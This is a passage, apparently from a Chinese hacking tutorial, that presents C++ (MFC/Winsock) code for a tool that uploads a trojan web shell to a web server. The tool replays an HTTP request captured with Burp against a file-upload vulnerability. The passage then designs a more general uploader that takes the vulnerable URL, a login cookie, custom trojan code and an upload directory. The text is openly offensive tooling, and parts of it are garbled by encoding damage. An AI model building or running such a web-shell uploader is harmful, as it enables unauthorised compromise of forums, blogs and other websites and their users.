上傳木馬的模塊可以通過(guò)直接發(fā)包達(dá)到上傳的效果,，實(shí)現(xiàn)起來(lái)比較簡(jiǎn)單，代碼如下：

　　void CuploadmumaDlg::OnBnClickedButton1（）

　　{

　　// TODO: 在此添加控件通知處理程序代碼

　　WSAData wsa = { 0 };

　　// 初始化

　　WSAStartup（MAKEWORD（2, 2）,， &wsa）,；

　　// 獲取 IP 地址

　　DWORD dwIPAddr = 0;

　　m_IpAddr.GetAddress（dwIPAddr）；

　　// 獲取端口號(hào)

　　WORD dwPort = 0;

　　dwPort = GetDlgItemInt（IDC_PORT）,；

　　// 創(chuàng)建 SOCKET

　　SOCKET s = socket（PF_INET, SOCK_STREAM, IPPROTO_TCP）,；

　　sockaddr_in sockaddr = { 0 };

　　sockaddr.sin_family = AF_INET;

　　sockaddr.sin_addr.S_un.S_addr = htonl（dwIPAddr）,；

　　sockaddr.sin_port = htons（dwPort）；

　　// 連接服務(wù)器

　　int nRet = connect（s, （SOCKADDR*）&sockaddr, sizeof（SOCKADDR））,；

　　// 獲取從 BURP 截取的 HTTP 的 request 包

　　char szText[2048] = { 0 };

　　GetDlgItemText（IDC_TEXT, szText, 2048）,；

　　// 發(fā)送包

　　nRet = send（s, szText, lstrlen（szText）， 0）,；

　　closesocket（s）,；

　　WSACleanup（）；

　　}

　　代碼的流程比較簡(jiǎn)單,，主要就是完成了與Web服務(wù)器的連接,，然后發(fā)送通過(guò)Burp截取的數(shù)據(jù)內(nèi)容，程序界面如圖1所示,。

　　圖1  發(fā)送木馬數(shù)據(jù)包上傳木馬

　　該木馬發(fā)送程序比較簡(jiǎn)陋,，只是簡(jiǎn)單地提交了對(duì)Web服務(wù)器請(qǐng)求的數(shù)據(jù)包。開(kāi)發(fā)一個(gè)較為通用的木馬上傳工具,，就不能這么偷懶了,。首先，需要提取出存在上傳漏洞的地址,，因?yàn)槊總€(gè)系統(tǒng)存在上傳漏洞的地址是不相同的,，因此漏洞的地址必須能夠接收用戶的輸入。接著提取HTTP請(qǐng)求頭部中的“Cookie”部分,，因?yàn)樯蟼髂抉R時(shí)可能需要登錄系統(tǒng)以后才能進(jìn)行上傳,，但是為什么發(fā)包的時(shí)候可以，因?yàn)閿?shù)據(jù)包中有COOKIE,，因此必須要能讓用戶輸入“cookie”,，因?yàn)橐话愕纳蟼髀┒纯赡苁钦搲⒉┛偷认到y(tǒng),，因此用戶可以自行登錄后,，將cookie復(fù)制出來(lái)并粘貼到程序中。然后還有木馬的內(nèi)容需要用戶自定義,，那么程序界面上也需要留下輸入木馬的文本框,，可以直接輸入木馬的代碼，也可以直接讓用戶輸入木馬的目錄,，然后讓程序從文件中把木馬代碼讀出,。有的上傳漏洞能夠讓用戶去控制上傳木馬后所在的目錄，那么還要給用戶一個(gè)可以設(shè)置上傳位置的輸入框,。